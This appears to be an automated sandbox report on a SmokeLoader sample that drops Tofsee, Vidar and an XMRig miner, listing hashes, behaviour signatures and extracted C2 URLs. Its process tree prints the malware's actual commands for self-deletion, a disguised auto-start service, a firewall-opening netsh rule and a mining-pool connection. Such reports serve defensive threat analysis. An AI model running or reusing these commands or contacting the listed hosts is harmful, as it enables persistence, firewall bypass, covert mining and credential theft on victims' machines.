Overview

overview

10

Static

static

a27e10e9ae...8f.exe

windows7_x64

10

a27e10e9ae...8f.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    28-03-2021 07:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a27e10e9ae9c9322be87216d84ac718f.exe

  • Size

    163KB

  • MD5

    a27e10e9ae9c9322be87216d84ac718f

  • SHA1

    41ef20744ae39b938dd45b9e0fc15f3215fe0ce5

  • SHA256

    8501dc331081a8fdbb9f6a5789a8317acddd6ea7d5c0446f359df9c4922f9f72

  • SHA512

    622f387a16066681ab59e54d8d8ba7a404682f7e27d1ddd5e0694717a5a136551a55e6dd2b62380a49ebdc67242fde600e1b8b3ee6261d589973045bb298b895

Score
10/10
smokeloadertofseevidarxmrigbackdoordiscoveryevasionminerpersistencespywarestealertrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://xsss99.icu/upload/

http://bingooodsg.icu/upload/

http://junntd.xyz/upload/

http://ginessa11.xyz/upload/

http://overplayninsx.xyz/upload/

http://bananinze.com/upload/

http://daunimlas.com/upload/
rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a27e10e9ae9c9322be87216d84ac718f.exe
    "C:\Users\Admin\AppData\Local\Temp\a27e10e9ae9c9322be87216d84ac718f.exe"
    1⤵
    • Loads dropped DLL
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:504
  • C:\Users\Admin\AppData\Local\Temp\F8BD.exe
    C:\Users\Admin\AppData\Local\Temp\F8BD.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:2760
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im F8BD.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\F8BD.exe" & del C:\ProgramData\*.dll & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2244
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im F8BD.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4028
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 6
        3⤵
        • Delays execution with timeout.exe
        PID:1284
  • C:\Users\Admin\AppData\Local\Temp\810.exe
    C:\Users\Admin\AppData\Local\Temp\810.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3656
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mqscyzmg\
      2⤵
        PID:1344
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ofbizycg.exe" C:\Windows\SysWOW64\mqscyzmg\
        2⤵
          PID:3644
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create mqscyzmg binPath= "C:\Windows\SysWOW64\mqscyzmg\ofbizycg.exe /d\"C:\Users\Admin\AppData\Local\Temp\810.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3760
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description mqscyzmg "wifi internet conection"
            2⤵
              PID:3968
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start mqscyzmg
              2⤵
                PID:1792
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2856
              • C:\Windows\SysWOW64\mqscyzmg\ofbizycg.exe
                C:\Windows\SysWOW64\mqscyzmg\ofbizycg.exe /d"C:\Users\Admin\AppData\Local\Temp\810.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3700
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3192
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3732

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/504-2-0x0000000002580000-0x0000000002581000-memory.dmp

                Filesize

                4KB

                Download

              • memory/504-3-0x00000000001E0000-0x00000000001E9000-memory.dmp

                Filesize

                36KB

                Download

              • memory/504-4-0x0000000000400000-0x0000000000409000-memory.dmp

                Filesize

                36KB

                Download

              • memory/2760-10-0x0000000002590000-0x0000000002591000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2760-13-0x0000000000400000-0x0000000000498000-memory.dmp

                Filesize

                608KB

                Download

              • memory/2760-12-0x0000000000B40000-0x0000000000BD5000-memory.dmp

                Filesize

                596KB

                Download

              • memory/2876-6-0x0000000000B40000-0x0000000000B56000-memory.dmp

                Filesize

                88KB

                Download

              • memory/3192-47-0x0000000004450000-0x000000000465F000-memory.dmp

                Filesize

                2.1MB

                Download

              • memory/3192-48-0x00000000006F0000-0x00000000006F6000-memory.dmp

                Filesize

                24KB

                Download

              • memory/3192-40-0x0000000000660000-0x0000000000675000-memory.dmp

                Filesize

                84KB

                Download

              • memory/3192-36-0x0000000000660000-0x0000000000675000-memory.dmp

                Filesize

                84KB

                Download

              • memory/3656-23-0x0000000000400000-0x0000000000415000-memory.dmp

                Filesize

                84KB

                Download

              • memory/3656-22-0x0000000000910000-0x0000000000923000-memory.dmp

                Filesize

                76KB

                Download

              • memory/3656-19-0x00000000024E0000-0x00000000024E1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3700-39-0x0000000000400000-0x0000000000415000-memory.dmp

                Filesize

                84KB

                Download

              • memory/3700-35-0x00000000012C0000-0x00000000012C1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3700-34-0x00000000012C0000-0x00000000012C1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3732-49-0x00000000032F0000-0x00000000033E1000-memory.dmp

                Filesize

                964KB

                Download